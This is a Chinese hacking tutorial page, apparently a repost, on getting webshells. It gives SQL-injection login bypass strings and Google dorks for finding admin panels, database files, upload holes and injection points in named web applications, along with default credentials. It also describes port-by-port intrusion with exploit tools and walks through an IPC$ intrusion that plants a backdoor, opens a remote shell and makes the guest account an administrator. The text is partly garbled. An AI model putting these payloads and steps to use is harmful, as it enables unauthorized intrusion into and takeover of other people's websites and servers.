怎样拿shell的技巧结合本人和网络上的一些资料,仅供参考!

经典的用户名密码
‘or’=’or’
‘or’1’=’1

这2个密码在很多网站后台,QQ空间相册都可以登陆,不过不是100%而已….

inurl: 用于搜索网页上包含的URL. 这个语法对寻找网页上的搜索,帮助之类的很有用.
intext: 只搜索网页部分中包含的文字(也就是忽略了标题,URL等的文字).
site: 可以限制你搜索范围的域名.
filetype: 搜索文件的后缀或者扩展名
intitle: 限制你搜索的网页标题.
allintitle: 搜索所有关键字构成标题的网页. 但是推荐不要使用
link: 可以得到一个所有包含了某个指定URL的页面列表. 例如link:www.google.com 就可以得到所有连接到Google的页面

===================================================
intext:管理
filetype:mdb
inurl:file
site:xx.com filetype:txt 查找TXT文件 其他的依次内推
site:xx.com intext:管理
site:xx.com inurl:login
site:xx.com intitle:后台
查看服务器使用的程序
site:xx.com filetype:asp
site:xx.com filetype:php
site:xx.com filetype:jsp
查看上传漏洞:
site:xx.com inurl:file
site:xx.com inurl:load
查找注射点:
site:xx.com filetype:asp
site:tw inurl:asp?id= 这个是找台湾的

site:jp inurl:asp?id= 这个是找日本的

site:ko inurl:asp?id= 这个是找韩国的
依次类推

intitle:旁注- 网站小助手filetype:asp
inurl:editor/db/
inurl:eWebEditor/db/
inurl:bbs/data/
inurltabackup/
inurl:blog/data/
inurl:\boke\data
inurl:bbs/database/
inurl:conn.asp
inc/conn.asp

管理入口:
admin
admin_index
admin_admin
index_admin
admin/index
admin/default
admin/manage
admin/login
manage_index
index_manage
superadmin
admin1
admin_login
login_admin
ad_login
ad_manage
count
manager
guanli
denglu
houtai
houtaiguanli
htgl
adminlogin
adminuserlogin
adm_login
chklogin
chkadmin
users
adduser
admin_user
edituser
adminadduser
member
members
editmember
adminmember
addmember
logout
exit
login_out
adminedit
admin_edit
delete
admindelete
admin_delete
up
upload
upfile
backup
config
test
webmaster
root
aadmin
admintab
admin_main
art
article
databases
db
dbase
devel
files
forum
girl
girls
htdocs
idea
ideas
include
includeinc
includes
incoming
install
manual
misc
mrtg
private
program
programming
programs
public
secret
secrets
server_stats
server-info
server-status
set
setting
setup


snmp
source
sources
sql
statistics
Stats
telephone
temp
temporary
tool
tools
usage
weblog
weblogs
webstats
work
wstats
wwwlog
wwwstats
wenzhang
admin/login.asp
admin_index.asp
bbs/admin_index.asp
article/admin/admin.asp
admin/aspcheck.asp
inc/config.asp
eWebEditor/admin_login.asp
editor/admin_login.asp
login/login
login/index
login/super
login1
update
count_admin
add_admin
admin_pass
newbbs/login
down/login
bbs/admin/login
main/login
admin/manage.asp
manage/login.asp
user.asp
conn.asp
logout.asp
readme.txt
说明.txt
manager/login
manager/login.asp
manager/admin.asp
login/admin/admin.asp
houtai/admin.asp
guanli/admin.asp
denglu/admin.asp
admin_login/admin.asp
admin_login/login.asp
admin/manage/admin.asp
admin/manage/login.asp
admin/default/admin.asp
admin/default/login.asp
member/admin.asp
member/login.asp
administrator/admin.asp
administrator/login.asp
强大的数据库:
database/PowerEasy4.mdb #动易网站管理系统4.03数据库
database/PowerEasy5.mdb
database/PowerEasy6.mdb
database/PowerEasy2005.mdb
database/PowerEasy2006.mdb
database/PE_Region.mdb
data/dvbbs7.mdb #动网论坛数据库
databackup/dvbbs7.mdb #动网论坛备份数据库
bbs/databackup/dvbbs7.mdb #动网论坛备份数据库
data/zm_marry.asp #动网sp2美化版数据库
databackup/dvbbs7.mdb
admin/data/qcdn_news.mdb #青创文章管理系统数据库
firend.mdb #交友中心数据库
database/newcloud6.mdb #新云管理系统6.0数据库
database/%23newasp.mdb #新云网站系统
blogdata/L-BLOG.mdb #L-BLOG v1.08数据库
blog/blogdata/L-BLOG.mdb #L-BLOG v1.08数据库
database/bbsxp.mdb #BBSXP论坛数据库
bbs/database/bbsxp.mdb #BBSXP论坛数据库
access/sf2.mdb #雪人论坛程序v2.0数据库
data/Leadbbs.mdb #LeadBBS论坛 v3.14数据库
bbs/Data/LeadBBS.mdb #LeadBBS论坛 v3.14数据库
bbs/access/sf2.mdb #雪人论坛程序v2.0数据库
fdnews.asp #六合专用BBS数据库
bbs/fdnews.asp #六合专用BBS数据库
admin/ydxzdate.asa #雨点下载系统 v2.0+sp1数据库
data/down.mdb #动感下载系统xp ver2.0数据库
data/db1.mdb #动感下载系统xp v1.3数据库
database/Database.mdb #轩溪下载系统 v3.1数据库
db/xzjddown.mdb #lhdownxp下载系统数据库
db/play.asp #娱乐先锋论坛 v3.0数据库
mdb.asp #惊云下载系统 v1.2数据库
admin/data/user.asp #惊云下载系统 v3.0数据库
data_jk/joekoe_data.asp #乔客6.0数据库
data/news3000.asp #沸腾展望新闻系统 v1.1数据库
data/appoen.mdb #惠信新闻系统4.0数据库
data/12912.asp #飞龙文章管理系统 v2.1数据库
database.asp #动感极品下载管理系统 v3.5
download.mdb #华仔软件下载管理系统 v2.3
dxxobbs/mdb/dxxobbs.mdb #dxxobbs论坛数据库
db/6k.asp #6kbbs 用户名:admin 密码:6kadmin
database/snowboy.mdb #雪孩论坛 默认后台admin/admin_index.asp
database/%23mmdata.mdb #依爽社区
editor/db/ewebeditor.mdbeWebEditor/db/ewebeditor.mdb

上穿漏洞:
/eWebEditor/upload.asp #eWebEditor上传页面
/editor/upload.asp #eWebEditor上传页面
/bbs/upfile.asp #动网论坛上传页面
/forum/upfile.asp #动网论坛上传页面
/dvbbs/upfile.asp #动网论坛上传页面
/upfile_soft.asp #动力管理系统上传页面
/upload.asp?action=upfile #乔客6.0上传页面
/upfile.asp #动网论坛上传页面
/bbs/down_addsoft.asp #动网论坛插件上传页面
/bbs/down_picupfile.asp #动网论坛插件上传页面
/down_picupload.asp #动网论坛插件上传页面
/admin/admin_upfile.asp #管理员后台上传页面
/admin/upfile.asp #管理员后台上传页面
/admin/upload.asp #管理员后台上传页面
/admin/uploadfaceok.asp #尘缘上传页面
/news/admin/upfile.asp #新闻管理上传页面
/admin_upfile.asp #飞龙文章管理系统 v2.0
/user_upfile.asp #飞龙文章管理系统 v2.0
/upload_flash.asp #秋叶购物商城上传页面
/Saveannounce_upload.asp #购物中心上传页面
/UploadFace.asp #沸腾展望新闻系统 v1.1
/bbs/diy.asp #Domian3.0默认木马
/UploadSoft/diy.asp #Domian3.0默认木马
/diy.asp #Domian3.0默认木马
/upload/upload.asp #某某文章管理系统
/mybbs/saveup.asp #MYBBS论坛上传页面
/dxxobbs/upload.asp #DxxoBBS论坛上传页面
/img_upfile.asp #任我飞扬驿站上传页面
/Upfile_SoftPic.asp #动力管理系统上传页面
/upfile_flash.asp #秋叶购物商城上传页面

PHP的:
phpmyadmin
include/config.inc.php
include/config.php
lib/config.php

首先打http://www.baidu.com,在关键词输入框中输入index of mp3,选择回车搜索,得到了一些mp3网站的资源列表

以下是百度搜索排名
index of mpeg4
3. index of mp3
4. index of rmvb
5. index of rm
7. index of movie
8. index of swf
9. index of jpg
10. index of admin
12. index of pdf
13. index of doc
14. index of wmv
15. index of mdb
16. index of mpg
17. index of mtv
18. index of software
19. index of mov
20. index of asf
23. index of lib
24. index of vod
25. index of rar
27. index of exe
28. index of iso
29. index of video
30. index of book
31. index of soft
32. index of chm
33. index of password
34. index of game
35. index of music
36. index of dvd
37. index of mid
38. index of ebook
40. index of download

最重要的记住页面一些关键的字 具有一定的特性的比如
[转到父目录]
这几个字虽然很普通但是不要忘了一般有遍历目录漏洞的站点都有个这个

bbs/data/+转到父目录
data/+转到父目录
/+转到父目录
转到父目录rmvb
inurl:/diy.asp

—–附:”这些资料有些年代,适用于初学者!

1,
到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!

2,
到Google ,site:cq.cn inurl:asp

3,
利用挖掘鸡和一个ASP木马.
文件名是login.asp
路径组是/manage/
关键词是went.asp
用’or’=’or’来登陆

4,
关键字:Co Net MIB Ver 1.0网站后台管理系统

帐号密码为 ‘or’=’or’

5.
动感购物系统
inurl:help.asp登陆,如未注册成为会员!

upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞

6。
默认数据库地址blogdata/acblog.asa
关键字:acblog

7.
百度 /htdocs
注册里可以直接上传asa文件!

8.
/Database/#newasp.mdb
关键词:NewAsp SiteManageSystem Version

9.
用挖掘机
关键字:Powered by WEBBOY
页面:/upfile.asp

10.
baidu中搜索关键字Ver5.0 Build 0519
(存在上传漏洞)

11.
Upfile_Article.asp bbs/upfile.asp
输入关键字:powered by mypower ,

12.
inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站

13.
现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp

14.
键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛

挖掘鸡的关键字 添 setup.asp

15.
VBulletin论坛的数据库
默认数据库地址!
/includes/functions.php
工具:
1.网站猎手 下载地址:百度 Google!
2.Google
关键字:
Powered by: vBulletin Version 3.0.1
Powered by: vBulletin Version 3.0.2
Powered by: vBulletin Version 3.0.3
其中一个就可以了

16.
1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart
open source。 这是一个商场系统。
2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~
猜到,comersus.mdb. 是数据库名
数据库都是放在database/ 后的,
所以database/comersus.mdb
comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。
那样把前一个”store/”除去,再加上database/comersus.mdb 试试

17.
无忧传奇官方站点程序。
1、后台管理地址:http://您的域名/msmiradmin/
2、默认后台管理帐号:msmir
3、默认后台管理密码:msmirmsmir
数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb
数据库连接文件为 */Conn.asp

18.
百度里输入/skins/default/

19.
利用挖掘机
关键机:power by Discuz
路径:/wish.php
配合:
Discuz!论坛 wish.php远程包含漏洞 工具使用

20.
上传漏洞.
工具 : Domain3.5
网站猎手 1.5版
关键字powered by mypower
检测的页面或文件插入upfile_photo.asp

21.
新云漏洞
这个漏洞ACCESS和SQL版通吃。
Google搜索关键字 “关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录”
把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
以源码,软件等下载站居多。
大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了
\database\%23newasp.mdb
如:#xzws.mdb 改成%23xzws.mdb

22.
通吃所有商城+动力上传系统

使用工具:挖掘鸡 v1.1 明小子
商城入侵:
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
漏洞页面:upload.asp
upfile_flash.asp

动力入侵:
关键字:powered by mypower
漏洞页面:upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp

23.
注射漏洞
百度搜索ioj’s blog

24
动易
列目录
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp

25.
工具:网站猎手
关键词:inurl:Went.asp
后缀:manage/login.asp
口令:’or’=’or’

26.
入侵魔兽私服
需要的工具:ASP木马一只。
Domain3.5明小子
关键字:All Right Reserved Design:游戏联盟
后台地址:admin/login.asp
数据库的地址:chngame/#chngame.mdb

27.
漏洞是利用管理员iis设置的失误
用baidu 关键字就是比较罕见的脚本名
动网: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
动易: admin_articlerecyclebin.asp

28.
国外站的爆库漏洞
关键字:sad Raven’s Guestbook
密码地址:/passwd.dat
后台地址:/admin.php

29.
Discuz 4.1.0跨站漏洞
利用工具:1,WAP浏览器
2,WAP编码转换器
关键字:”intextiscuz! 4.1.0”

30.
关键字:尚奈克斯
后台路径/system/manage.asp
直接传ASP木马

31.
工具
1:网站猎手
2:大马一个
关键字:切勿关闭Cookies功能,否则您将不能登录
插入diy.asp

32.
关键字:Team5 Studio All rights reserved
默认数据库ta/team.mdb

33.
工具: 挖掘机 辅臣数据库读取器
关键字: 企业简介 产品展示 产品列表
后缀添加: /database/myszw.mdb
后台地址: admin/Login.asp

34.
关键子 XXX inurl:Nclass.asp
在”系统设置”里写个木马。
会被保存到 在 config.asp内。

35.
不进后台照样拿动网WEBSHELL
data.asp?action=BackupData 动网数据库备份默认路径

36.
工具:网站猎手 WebShell
关键字:inurl:Went.asp
后缀:manage/login.asp
弱口令:’or’=’or’

37.
关键字owered byCDN_NEWS
随便扫遍文章加一个’ ,来试探注入点
后台地址:admin_index.asp

38.
入侵雷池新闻发布系统
关键字:leichinews
去掉leichinews后面的.
打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
再上传马…..
进访问uppic anran.asp 登陆马.

39.
关键字ower System Of Article Management Ver 3.0 Build 20030628
默认数据库tabase\yiuwekdsodksldfslwifds.mdb
后台地址:自己扫描!

40.
一、通过GOOGLE搜索找大量注入点
关键字:asp?id=1 gov.jp/ asp?id=
页数:100
语言:想入侵哪个国家就填什么语言吧

41.
关键字:Powered by:94KKBBS 2005
利用密码找回功能 找回admin
提问:ddddd 回答:ddddd

42.
关键字:inurl:Went.asp
后台为manage/login.asp
后台密码: ‘or’=’ 或者 ‘or”=”or’ 登录 进入
默认数据库地址atabase/DataShop.mdb

43.
关键字:** inurl:readnews.asp
把最后一个/改成%5c ,直接暴库,看密码,进后台
随便添加个新闻 在标题输入我们的一句话木马

44.
工具:一句话木马
BBsXp 5.0 sp1 管理员猜解器
关键词:powered by bbsxp5.00
进后台,备份一句话马!

45.
关键字:程序核心:BJXSHOP网上开店专家
后台:/admin
各个端口的入侵方法
1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后
SQLTools.exe入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口
sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433
(这个是正向连接)
2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器
3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破
。(tscrack.exe)
4. 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或
dvup_delphi.exe) 可以利用SQL进行注入。(啊D的注入软件)。
5. serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 对5.1.0.0及以下系
统,可用本地提升权限。(servlocal.exe) 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
6. 554端口 用real554.exe入侵。
7. 6129端口 用DameWare6129.exe入侵。
8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。
9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
经典IPC入侵1.C:netuse入侵 1. C:\>net use ”>\127.0.0.1\IPC“”/user:”admintitrators”这是用”流光”扫到的用户名是administrators,密码为”空”的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为”空”,所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。2.C:>copysrv.exe “” /user:”admintitrators” 这是用”流光”扫到的 用户名是administrators,密码为”空”的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来 与127.0.0.1建立一个连 接,因为密码为”空”,所以第一个引号处就不用输入,后面一个双引号里的是用 户名 ,输入administrators,命令即可成功完成。 2. C:>copy srv.exe ">\\127.0.0.1\admin先复制srv.exe上去,在流光的Tools目录下就有(这里的 先复 制srv.exe上去,在流光的Tools目录下就有(这里的是指admin用户的 c:\winnt\system32\,大家还可
以使用c、d、d,意思是C盘与D盘,这看你要复制到什么地方去了)。 3. C:>net time [url=file://%20%20127.0.0.1/]\127.0.0.1[/url] 查
查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。 4. C:>at
[url=file://%20%20127.0.0.1/]\127.0.0.1[/url] 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启
动啊. 5. C:>net time [url=file://%20%20127.0.0.1/]\127.0.0.1[/url] 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上
午 11:05,那就准备 开始下面的命令。 6. C:>telnet 127.0.0.1 99 这里会用到Telnet命令吧,注意
端口是99。Telnet默认的是23端口,但是我们使用的 是SRV在对方计算机中为我们建立一个99端口的
Shell。 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打 算建立一
个Telnet服务!这就要用到ntlm了 7.C:>copy ntlm.exe ">127.0.0.1\admin">\\127.0.0.1\admin 用Copy命令把
ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。 8. C:\WINNT\system32>ntlm 输入
ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这 个程序在对方计算机上
运行)。当出现”DONE”的时候,就说明已经启动正常。然后使 用”net start telnet”来开启Telnet服务
! 9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作 一样简单!(然
后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把guest激活加到管理组 10. C:>net
user guest /active:yes 将对方的Guest用户激活 11. C:>net user guest 1234 将Guest的密码改为
1234,或者你要设定的密码 12. C:>net localgroup administrators guest /add 将Guest变为
Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我 们可以用guest再次访问这台计
算机)

怎样拿shell的技巧相关推荐

  1. Linux Shell常用技巧(三) sed

    Linux Shell常用技巧(三) sed 八.流编辑器sed 8.1 sed简介 sed是stream editor的缩写,一种流编辑器,它一次处理一行内容.处理时,把当前处理的行存储在临时缓冲区 ...

  2. Linux Shell常用技巧(目录)

    Linux Shell常用技巧(一) http://liuxuyang.blog.51cto.com/2546552/1289413 一. 特殊文件: /dev/null和/dev/tty 二. 简单 ...

  3. 【shell 大系】Linux Shell常用技巧

    在最近的日常工作中由于经常会和Linux服务器打交道,如Oracle性能优化.我们数据采集服务器的资源利用率监控,以及Debug服务器代码并解决其效率和稳定性等问题.因此这段时间总结的有关Linux ...

  4. Linux Shell常用技巧(九) 系统运行进程

    Linux Shell常用技巧(九) 系统运行进程 十九.  和系统运行进程相关的Shell命令:         1.  进程监控命令(ps):       要对进程进行监测和控制,首先必须要了解当 ...

  5. Linux Shell常用技巧(一)

    Linux Shell常用技巧 文章转载自:http://www.cnblogs.com/stephen-liu74/archive/2011/12/20/2285454.html 一.    特殊文 ...

  6. 日志处理中一些shell命令技巧

    日志处理中一些shell命令技巧 阴差阳错的做的日志分析,前途未卜的这段日子,唯一还有点意思的可能就是手动的处理大量日志.总结一下. 日志文件的输入是动则几个G的文本.从N个这样的文件中得到一个列表, ...

  7. uwsgi怎么通过浏览器访问某个脚本_4个Shell小技巧帮你提高机器学习效率:写好脚本,事半功倍...

    晓查 发自 凹非寺 量子位 报道 | 公众号 QbitAI 在机器学习的实践过程中,用好Shell能帮你很多节省时间. 最近,有位来自ETHZ的学生分享了一些Shell小技巧.对程序员来说,这些技巧更 ...

  8. Linux常用命令(第二版) --Shell应用技巧

    Shell应用技巧 小技巧: 1.命令补全功能: <Tab>键 2.清屏: Ctrl+l 3.删除光标前所有内容: Ctrl+u 4.命令历史记录: history 这时:  !histo ...

  9. 6条shell小技巧,让脚本显得不再业余

    6条shell小技巧,让脚本显得不再业余 原创作者: 58沈剑 来自公众号:架构师之路 画外音:说实话,技术思路类文章(WHY, HOW),比技术实践类(WHAT)更难写. 如何能让自己的shell显 ...

  10. 4个Shell小技巧,帮你提高机器学习生产效率

    晓查 发自 凹非寺  量子位 报道 | 公众号 QbitAI 在机器学习的实践过程中,用好Shell能帮你很多节省时间. 最近,有位来自ETHZ的学生分享了一些Shell小技巧.对程序员来说,这些技巧 ...

最新文章

  1. NodeJs连接Mysql数据库
  2. 构建安全的Xml Web Service系列之初探使用Soap头
  3. 线程的状态转换、sleep()、wait()、yeild()、终止线程的方法、线程之间的协作(join()、wait() notify() notifyAll()、await() signal() )
  4. koa中上传文件到阿里云oss实现点击在线预览和下载
  5. VB打开资源管理器并指定文件
  6. 《认清C++语言》---接口继承和实现继承
  7. Scrapy创建zentao爬虫
  8. python符号怎么打_「符号怎么打出来」```这个符号怎么打出来 - seo实验室
  9. 无法启动此程序 因为计算机中丢失msvcr100.dll,Windows7电脑提示丢失MSVCR100.dll怎么办?...
  10. 电驴链接服务器老是无响应,全部服务器无响应!!!
  11. 【1】使用分类学习APP - Classification Learner App 训练分类模型
  12. Ubuntu桌面卡成狗,如何有效解决卡顿问题
  13. css cursor 鼠标指针样式总结
  14. 原来勾股定理可以这样证!
  15. Redis--Redis数据过期策略详解
  16. 门面设计模式(Facade Pattern)
  17. FME2019试用过程
  18. Python消除警告的实用解决方案
  19. 应对word无法编辑、无法选中、无法删除的方法
  20. 数据仓库概念和项目架构

热门文章

  1. 上市公司财务报告的那点事(6):用自己的语言解读《投资中最简单的事:投资理念》)
  2. ubuntu 里使用wordpress的坑点
  3. RSA加密为什么每次加密的结果不一样
  4. CSS 用浮动制作一个导航栏
  5. 4. DDPM, DDIM, Analytic-DPM, Extended Analytic-DPM
  6. #11-【贪心算法】合照
  7. win10怎么优化最流畅操作教程
  8. C语言中使用printf()打印漂亮的颜色字体
  9. 报错The server quit without updating PID file (/usr/local/mysql/data/mysql.pid)
  10. 2005年中国BBS社区100强